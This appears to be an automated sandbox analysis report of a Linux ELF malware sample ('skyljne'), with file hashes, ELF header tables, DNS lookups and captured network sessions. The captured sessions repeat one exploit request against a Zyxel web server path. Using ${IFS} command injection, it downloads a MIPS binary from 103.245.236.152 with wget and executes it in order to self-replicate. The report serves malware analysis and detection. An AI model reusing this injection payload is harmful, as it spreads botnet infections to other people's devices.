                                          https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui6rA8UWHa8iVIH5QBEYaXLDbZP5N-2BdkCWz-2F1IJzKRG88bEtn_gc46O3oHUojpaMnjRpERfgsFPIUVjicLvf7cndFQAhxjlZyRRCr-2FjMNBkswU3cb9RQB4FP37vQqCAUF51xqkt2suF4xmiVRJe-2BJ-2BbGvAIBl-2FgLKjBc-2FuG2dfEqrB8-2FHlR-2BUKw93XVLTZngmB62oRdtLwmpxQTt3XvtmKPzjDQUd86Jw0jZJfvdqrgTlS02lxq2Bxwov8QT1g8doAI5Am-2FTaiWVi1UhIa5u1eL9UcUT18yAXql893uJOOtsRdTu5Areisyy7OhrCEZDNC1N4pLnJFX1k486FmhNmBK8wh-2BuoOpa389bOCUB2rkwF7UcAKGet hashmaliciousHTMLPhisherBrowse
                                          • 23.212.251.72
                                          skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                          • 23.204.246.43
                                          1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                          • 23.50.124.134
                                          1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                          • 23.50.124.134
                                          Enquiry_No._2324561.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 23.220.112.134
                                          https://ecv.microsoft.com/ss9eL9LgBEGet hashmaliciousHTMLPhisherBrowse
                                          • 23.212.249.91
                                          wfxre.exeGet hashmaliciousUnknownBrowse
                                          • 104.107.1.18
                                          XWX354.exeGet hashmaliciousUnknownBrowse
                                          • 104.107.1.18
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):5.275461296323251
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:skyljne.x86_64.elf
                                          File size:155'960 bytes
                                          MD5:059c0115b367791e046b05ee0249d52c
                                          SHA1:0ffe6e224fce973cd4bf4854003cd0badb8cdf50
                                          SHA256:9cbf86ec6517051c9ec7451d9ae7f149c00ef4bc4009ac8dc7735e64fb41d2a9
                                          SHA512:6614607ac7fe645f0a92b70f506e79f827e7d86aec2c9f9b8110aadeb7205c942c0034ae83940b1710c666d1e39f0e87f7aaea23e45c3ddf64854e2cd801a742
                                          SSDEEP:3072:3cNhovYB3ouQWPGVcdpXaxxTtzJw9PrEaWKF57DRaN1Ya:3cNhovYB3ouUTHAhAYa
                                          TLSH:97E34A17B5C184FDC4DAC1B44BAFB636DD32B0AC1238B16B37D4AA261E5DE205F5EA40
                                          File Content Preview:.ELF..............>.......@.....@........^..........@.8...@.......................@.......@...............................................Q.......Q.....x.......@...............Q.td....................................................H...._....Z...H........

                                          ELF header

                                          Class:ELF64
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:Advanced Micro Devices X86-64
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x400194
                                          Flags:0x0
                                          ELF Header Size:64
                                          Program Header Offset:64
                                          Program Header Size:56
                                          Number of Program Headers:3
                                          Section Header Offset:155320
                                          Section Header Size:64
                                          Number of Section Headers:10
                                          Header String Table Index:9
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x4000e80xe80x130x00x6AX001
                                          .textPROGBITS0x4001000x1000x18d860x00x6AX0016
                                          .finiPROGBITS0x418e860x18e860xe0x00x6AX001
                                          .rodataPROGBITS0x418ea00x18ea00x35e00x00x2A0032
                                          .ctorsPROGBITS0x51d0000x1d0000x180x00x3WA008
                                          .dtorsPROGBITS0x51d0180x1d0180x100x00x3WA008
                                          .dataPROGBITS0x51d0400x1d0400x8e380x00x3WA0032
                                          .bssNOBITS0x525e800x25e780x70c00x00x3WA0032
                                          .shstrtabSTRTAB0x00x25e780x3e0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x4000000x4000000x1c4800x1c4806.40800x5R E0x100000.init .text .fini .rodata
                                          LOAD0x1d0000x51d0000x51d0000x8e780xff400.23070x6RW 0x100000.ctors .dtors .data .bss
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 14, 2024 15:45:50.647001028 CET192.168.2.238.8.8.80x179fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                          Jan 14, 2024 15:46:58.192737103 CET192.168.2.238.8.8.80xdfa5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 14, 2024 15:45:50.760948896 CET8.8.8.8192.168.2.230x179fNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                          Jan 14, 2024 15:46:58.295250893 CET8.8.8.8192.168.2.230xdfa5No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                          Session IDSource IPSource PortDestination IPDestination Port
                                          0192.168.2.2349150124.57.119.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648142099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1192.168.2.2337158122.6.13.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648173094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192.168.2.2333774220.59.68.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648202896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192.168.2.2359944106.85.84.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648263931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192.168.2.2357774154.21.124.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648281097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5192.168.2.2342786107.228.148.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648286104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192.168.2.2348230142.102.216.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648330927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7192.168.2.235867420.131.1.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648381948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192.168.2.2350450203.119.129.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648422956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192.168.2.235917870.229.243.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648458004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10192.168.2.234961064.88.208.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648478985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11192.168.2.2360202106.101.32.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648536921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192.168.2.235593894.74.116.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648582935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13192.168.2.2334650126.171.50.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648588896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14192.168.2.235015465.55.197.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648633957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15192.168.2.2350300207.74.152.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648688078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16192.168.2.2340984118.134.3.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648742914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17192.168.2.234499843.40.124.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648813963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18192.168.2.235023880.228.246.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648845911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19192.168.2.235523420.34.150.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648859978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20192.168.2.2345992191.126.165.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648926020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21192.168.2.23441608.83.255.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648958921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22192.168.2.2354368197.71.23.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.648988008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23192.168.2.2337968152.54.135.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649029016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24192.168.2.2333014133.19.217.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649043083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25192.168.2.2356670154.93.7.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649074078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26192.168.2.2335494200.82.22.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649158001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27192.168.2.2357106190.23.131.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649183989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28192.168.2.23441928.107.24.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649260044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          29192.168.2.234837295.0.141.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649286985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          30192.168.2.23497225.17.238.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649303913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          31192.168.2.2345056174.180.50.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649343014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          32192.168.2.2355116156.61.36.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649384022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          33192.168.2.2360840101.124.161.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649414062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          34192.168.2.2340120148.62.41.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649485111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          35192.168.2.2349454151.24.78.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649522066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          36192.168.2.2337934100.217.133.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649558067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          37192.168.2.2334712115.224.76.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649574995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          38192.168.2.2355224209.47.2.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649605989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          39192.168.2.234828278.81.122.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649626970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          40192.168.2.23527608.227.138.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649648905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          41192.168.2.234337238.14.139.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649683952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          42192.168.2.234288890.21.215.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649714947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          43192.168.2.2359496115.28.204.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649718046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          44192.168.2.2349644191.45.59.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649765968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          45192.168.2.233850876.109.99.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649779081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          46192.168.2.2350358107.24.152.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649836063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          47192.168.2.2351766109.177.149.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649862051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          48192.168.2.2349068179.49.14.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649930954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          49192.168.2.2344338204.145.118.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.649985075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          50192.168.2.2358748220.154.43.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650015116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          51192.168.2.2346788152.151.183.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650015116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          52192.168.2.2350150187.177.133.19443
                                          TimestampBytes transferredDirectionData
